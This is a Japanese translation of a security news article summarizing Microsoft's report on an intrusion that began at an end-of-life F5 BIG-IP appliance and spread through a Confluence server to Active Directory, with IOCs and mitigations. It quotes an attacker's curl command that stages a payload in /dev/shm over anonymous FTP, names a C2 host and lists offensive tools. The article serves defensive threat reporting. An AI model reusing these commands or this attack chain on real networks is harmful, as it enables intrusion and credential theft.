脅威アクターは廃止されたF5 BIG-IPアプライアンスを積極的に悪用して、エンタープライズネットワークへの不正なSSHアクセスを取得し、危害を与えたデバイスを洗練された多段階の侵入キャンペーンの足がかりとして使用し、最終的にActive Directoryインフラストラクチャを標的にしています。
Microsoft Threat Intelligenceは2026年5月22日に完全な攻撃チェーンを公開し、単一の危害を受けたエッジアプライアンスがLinuxホスト、内部Atlassian Confluenceサーバー、Windowsの認証システムに及ぶドメインレベルの危害へどのようにエスカレートしたかを記載しています。
記載された事件では、調査官は脅威アクターの最初のSSHアクセスをAzureホストされているF5 BIG-IP Virtual Edition(VE)バージョン15.1.201000にたどり着きました。これはAzure ARMテンプレートおよびTerraformモジュールを経由して一般的にプロビジョニングされるクラウドデプロイメント構築です。
この特定のバージョンは2024年12月31日に廃止(EOL)に達し、危害の時点で未パッチおよびサポート対象外のままでした。
SSHアクセスを取得するためのF5 BIG-IP
タイミングはより広いF5の脅威状況と直接一致しています。2025年8月に、洗練された国家主導の脅威アクターがF5の内部システムに侵入し、BIG-IPの製品ソースコードと未公開のパッチ未適用の脆弱性の詳細を流出させました。
F5により2025年10月に公開されたその侵害は、BRICKSTORM マルウェアファミリーにリンクされており、これはソフトウェアとクラウドベンダーを標的にしてソースコードと認証情報を収集し、下流のサプライチェーン悪用のためのキャンペーンに関連しています。
リスクを複合化する、F5 BIG-IP Access Policy Manager(APM)の重大な欠陥CVE-2025-53521は、元々2025年10月にサービス拒否バグとして公開されました。しかし、2026年3月にCVSSスコア9.8のリモートコード実行(RCE)脆弱性として再分類されました。
CISAはCVE-2025-53521を2026年3月27日に既知の悪用される脆弱性(KEV)カタログに追加し、Shadowserver Foundationは当時、世界中で17,000以上の脆弱なIPを報告しました。オランダ国家サイバーセキュリティセンターも、この脆弱性の積極的な乱用を独立して確認しました。
危害を受けたF5アプライアンス経由でSSHアクセスが確立されると、脅威アクターは無制限のsudo権限を持つ特権アカウントを使用して認証し、明示的な永続化メカニズムをデプロイせずに、侵入全体を通じてキーボードへの実際のアクセスを維持しました。
攻撃者は、階層化されたツールキットを使用して、すぐに積極的な偵察を開始しました:
- 内部サブネット全体での水平および垂直ネットワークスキャンのための自動化されたシェルスクリプトを使用したNmap
- 発見されたすべてのHTTP/HTTPSサービスのスクリーンショット取得のためのGoWitness
- SSL/TLSの弱点を調査し、潜在的なプロトコルダウングレードパスを特定するためのtestssl
- HackTool:Linux/MalPack.Bとして検出されたカスタムELFバイナリは
206.189.27[.]39:8888からwgetを経由してダウンロードされ、Webアプリケーションアクセス制御を列挙します
enum4linux、kerbrute、responder、smbclient、netexecを含む標準的なNTLMベースの横展開ツールを使用してWindows インフラストラクチャに対する試みは、最初は失敗しました。
偵察中、脅威アクターはパッチが適用されていないリモートコード実行脆弱性を持つ、内部的にホストされているAtlassian Confluenceサーバーを特定しました。
Microsoftは、サーバーはインターネットに面していなかったと述べました。攻撃者が内部ネットワークアクセスを取得した後にのみ到達可能になり、ハイブリッドおよびクラウド環境でサービス間に暗黙の信頼境界が存在する主要なリスクです。
Confluenceホスト上のリアルタイム保護(RTP)が直接ペイロード配信をブロックしたとき、脅威アクターは、初期のLinuxホスト上にPython FTPサーバーをセットアップして、匿名FTPを使用してペイロードをステージングして転送することで対応しました:
bashcurl -o /dev/shm/ag ftp://anonymous:anonymous@[REDACTED_LOCAL_IP]/5
Confluenceを危害した後、攻撃者は/opt/atlassian/confluence/conf/server.xmlおよびconfluence.cfg.xmlから認証情報を抽出し、ドメインインフラストラクチャに対するKerberosリレー攻撃のために武器化しました。
これには、2025年6月にRedTeam PentestingおよびSynacktivの研究者によって公開されたWindows SMB NTLM反射脆弱性CVE-2025-33073の悪用が含まれます。
CVE-2025-33073は、SMB署名が強制されていないドメインに参加しているマシン上でSYSTEMとして認証されたRCEを達成するための管理者アクセスの前提条件を削除し、ネットワークアクセスと有効なドメイン認証情報のみが必要です。
| インジケーター | タイプ | 説明 |
|---|---|---|
4a927d031919fd6bd88d3c8a917214b54bca00f8ddc80ecfe4d230663dda7465 |
SHA-256ファイルハッシュ | カスタムスキャンツール(HackTool:Linux/MalPack.B) |
b4592cea69699b2c0737d4e19cff7dca17b5baf5a238cd6da950a37e9986f216 |
SHA-256ファイルハッシュ | Nmapネットワークスキャンを自動化するシェルスクリプト |
710a9d2653c8bd3689e451778dab9daec0de4c4c75f900788ccf23ef254b122a |
SHA-256ファイルハッシュ | Kerbruteツール(HackTool:Linux/Kerbrute!rfn) |
57b3188e24782c27fdf72493ce599537efd3187d03b80f8afe733c72d68c5517 |
SHA-256ファイルハッシュ | gowitness HTTP/HTTPSスクリーンショットスキャナー |
bdd5da81ac34d9faa2a5118d4ed8f492239734be02146cd24a0e34270a48a455 |
SHA-256ファイルハッシュ | NTLMリレーPythonスクリプト(CVE-2025-33073悪用) |
206.189.27[.]39 |
IPv4アドレス(Defanged) | ポート8888でのC2サーバーペイロード配信 |
注:IPアドレスとドメインは、意図的にDefanged(例:[.])であり、偶発的な解決またはハイパーリンクを防ぐためです。MISP、VirusTotal、またはSIEMなどの管理された脅威インテリジェンスプラットフォーム内でのみ再Fangしてください。
対策
- 廃止されたアプライアンスを即座に廃止し、インターネットに面したエッジデバイスを厳密なライフサイクル管理を備えたTier-0資産として扱う
- Confluenceなどの内部アプリケーションを、インターネット公開サービスと同じ緊急性でパッチする。
- NTLMを無効にするか最小化し、SMB署名を強制し、LDAPの署名とチャネルバインディングを有効にしてリレー攻撃をブロックする
- Microsoft Defender for EndpointをすべてのLinuxサーバー全体でブロックモードで一貫して有効にする。
- 段階的な管理モデルを実装して、単一のアプリケーション認証情報盗用がドメインコントローラーに到達するのを防ぐ
Google News、LinkedIn、Xで私たちをフォローして、即座の更新を取得し、GoogleでGBHを優先ソースとして設定してください。
翻訳元: https://gbhackers.com/hackers-exploit-f5-big-ip/
